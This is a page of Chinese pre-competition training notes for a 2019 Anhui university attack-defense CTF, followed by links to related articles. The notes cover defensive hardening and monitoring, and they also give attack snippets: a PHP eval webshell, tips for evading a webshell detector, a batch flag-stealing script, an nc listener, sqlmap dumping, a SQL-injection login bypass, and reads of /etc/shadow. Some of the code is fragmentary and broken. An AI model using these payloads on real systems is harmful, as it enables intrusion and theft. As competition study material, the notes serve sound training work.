2019年安徽省大学生网络攻防赛赛前培训——Day2
AWD(高职组)比赛思路
- 流量分析虚拟机,下载流量文件进行数据分析(可能无)*
- flag刷新
- flag被拿走,该队扣分,攻击者得分
- 主办方对队伍的服务器进行check,扣分。得分由其他队伍均分
- 数据库密码
- 数据库 (database-config.php)
- /etc/redis/redis.conf
- tomacat-user.xml
- webpass.
- 用户,目录,端口,进程信息(提权)
(ps,netstat -anptu,top,/etc/issue) - 网站后门,web日志(get,),flag日志,history,(备份网站)
- 备份与恢复(删源码)
- tar -czf 目录
- 备份到本地
- 编写waf
- 做好数据清洗和日志信息
- 文件与进程监控
- 文件监控(python脚本,filecmp,shutil,os)
- 进程监控
- 修改服务口令,约束服务外联
- 同步当前ssh用户主目录
- 定期清理seesions文件,tmp目录
- 服务弱口令
- 主办方后门
- 确定cms版本号,搜exploit进行利用
- 一句话木马(限制ip,避免被D盾检测)
- Linux基础
- grep -nir “eval” /var/www/html
- ps -ef |grep httpd
- echo -e “\oldpasswd\nnewpasswd\nnewpasswd” | passwd
- ps -u apache -o user,pid
- contrab -r //删除自动化任务
- 常用脚本
- php程序脚本
- waf加载/卸载程序(过滤)
- 文件监控
- 进程监控
- 批量攻击脚本
- webshell管理系统
- mac地址绑定
- 漏洞(sql+文件上传+文件解析漏洞)
- 维持权限(提权),加固。
nc -lvvp 9999
服务器提权
cp flag放在网站目录下(contrab 创建任务直接cp flag)
import requests
for i in range(): ip = ??? try: req = requests.get(url) print(ip,req.text) expect: psss
eval(_$GET[PASS])
requests.get(url+?PASS=system("cat /flag"))
- 文件包含file_include(没有必要的话,直接过滤)
- check_login($user直接拼接到Sql查询语句,过滤不严格)
- 越权
- 上传文件(严格,验证后缀,上传文件功能删除)
- extract($_REQUEST); a(a(a(_post(‘b’)) 一句话木马(代码注入)
- 逻辑漏洞:admin 111 验证码正确(验证码不刷新不改变)post注入
sqlmap -r sql.txt --dbs (爆库)
CFS综合靶场(本科组)比赛
- 网络拓扑
采用内网渗透的方式
攻击机IP:172.24.10.x(255.255.255.0) 与第一层靶机的网卡1处于同一网段
第一层靶机 网卡1:172.24.10.x(255.255.255.0) 网卡2:172.24.11.x(255.255.255.0)
第二层靶机 网卡1:172.24.11.x(255.255.255.0)网卡2:172.24.12.x(255.255.255.0)
第三层靶机 网卡1:172.24.12.x(255.255.255.0)
攻入第一层靶机后,在第一层靶机上做代理依次访问第二台靶机
攻击思路
- nmap扫描
nmap -a -sV ip - 扫描后台
- 御剑
- dirsearch(python dirsearch.py -u “URL” )
- 登陆界面尝试sql注入 (万能密码admin’#)
- 上传webshell
- 找上传目录(注意扫描出来的后台)
- 传图片马 1.jpg.php等
- 测试phpinfo();
- 一句话木马
<?php phpinfo(); eval($_POST["PASS"]) ;?>
使用中国菜刀连接
- 寻找flag 常见flag位置
- /
- /etc/passwd
- /etc/shadow
- grep “flag” -R /
- 网站后台
- http ssh等配置文件
- crontab
- 数据库
- 网站的配置文件如:config.php
- 桌面 流量包 开机启动项 SAM密码文件 日志文件(windows)
- 收集提权脚本和代理脚本
2019年安徽省大学生网络攻防赛赛前培训——Day2相关推荐
- 2019年安徽省大学生网络攻防赛赛前培训——Day1
2019安徽省大学生网络攻防赛方案 高职组(AWD模式) 实时防护 无差别攻击 一对多.多对一 分值不封顶 范围 web类.系统安全.数据安全.溢出等 时长 总计3小时,前0.5小时加固,后2.5小时 ...
- 计算机学院 储昭坤,我校在“展航杯”安徽省大学生信息安全作品赛荣获佳绩...
10月28日,由安徽省教育厅主办,淮南师范学院.合肥工业大学.安徽省高等学校计算机教育研究会和合肥学院承办的2017年"展航杯"安徽省大学生信息安全作品赛在淮南师范学院举行.本次比 ...
- 澳门理工大学计算机学院,2019泛珠三角+大学生计算机作品赛总决赛将于澳门理工学院举行...
由澳门理工学院和澳门电脑学会联合举办的"2019泛珠三角+大学生计算机作品赛总决赛",将于七月三日至四日在澳门理工学院体育馆举行.来自全国十五个省市及地区的六十支优胜队伍,将在澳门理工学院角 ...
- 2019年安徽省大学生计算机博弈大赛,2019年辽宁省普通高等学校本科大学生计算机博弈竞赛在我校成功举行...
"大众创业.万众创新"战略的指导下,2019年辽宁省普通高等学校本科大学生计算机博弈竞赛于6月21-22日在沈阳航空航天大学拉开帷幕,省内18所高校136支代表队的300多名师生汇 ...
- 突出计算机学院的比赛名,学院在2019年全国大学生信息安全竞赛安徽省赛中喜获佳绩...
由安徽省教育厅主办的全国大学生信息安全竞赛安徽省赛,共设安徽省大学生网络攻防赛和安徽省大学生信息安全作品赛两项分赛事.学院由计算机学院组织多个团队参赛,分别获得2019年安徽省大学生网络攻防赛一等奖一 ...
- 2019年安徽省大数据与人工智能应用赛总结---本科组
前言 2019年安徽省大数据与人工智能决赛于10月13日在安徽省职业经济管理学院举办.现场赛共计90支队伍,经过4个小时的激烈追逐,我们组获得了22名的不错成绩,荣获省级二等奖 .严格意义上说,这是我 ...
- 2019 ACM - ICPC 上海网络赛 E. Counting Sequences II (指数型生成函数)
繁凡出品的全新系列:解题报告系列 -- 超高质量算法题单,配套我写的超高质量题解和代码,题目难度不一定按照题号排序,我会在每道题后面加上题目难度指数(1∼51 \sim 51∼5),以模板题难度 11 ...
- 2019澳门理工计算机作品决赛,我校学子在2019年泛珠三角+大学生计算机作品赛总决赛中斩获佳绩...
2019年7月4日由全国高等学校计算机教育研究会及泛珠三角大学生计算机作品赛组委会共同举办的"2019年(第十四届)泛珠三角+大学生计算机作品赛总决赛"在澳门落下帷幕.我校信息工程 ...
- 湖南省第十届蓝狐网络杯大学生计算机程序设计竞赛,2019年湖南省大学生计算机程序设计竞赛 (HNCPC2019) 简要题解...
2019年湖南省大学生计算机程序设计竞赛 (HNCPC2019) 简要题解 update10.01 突然发现叉姐把这场的题传到牛客上了,现在大家可以有地方提交了呢. 不知道该干什么所以就来水一篇题解 ...
最新文章
- DEAP:使用生理信号进行情绪分析的数据库(一、背景介绍与刺激选择)
- Python 网络服务相关 杂记
- NYOJ_5743Distribution(第八届河南省程序设计大赛)
- 最简单的语言来说JAVA中的NEW到底怎么搞
- mysql在mac上的坑
- 华为摄像机搜索软件_别人的终点华为的起点!用普惠AI守护城市安全
- 虚拟机四种网络连接模式比较
- 两个字符串的最长公共子序列长度_程序员编程算法,解决文本相似度问题的最长公共子序列算法!...
- 数据结构与算法笔记(三) 线性表(链式描述) 链表
- 微星小飞机怎么超频?
- 弘辽科技:淘宝旧链接如何打新品标?有什么规则?
- Beats:Beats 入门教程 (二)
- 零成本搭建实验室、课题组网站教程(基于uniapp)
- Linux SPI 子系统(x86平台)
- AD常用DRC规则简单介绍
- 【HTML】HTML网页设计----模仿汉服前端设计
- 技术人攻略访谈三十七-程显峰:IT病得有多重?技术圈交际花谈研发管理怪现状
- ISO20000与ISO27001有哪些区别?
- VBA EXCEL删除行的方法
- 分布式领域重要原理_李孟_新浪博客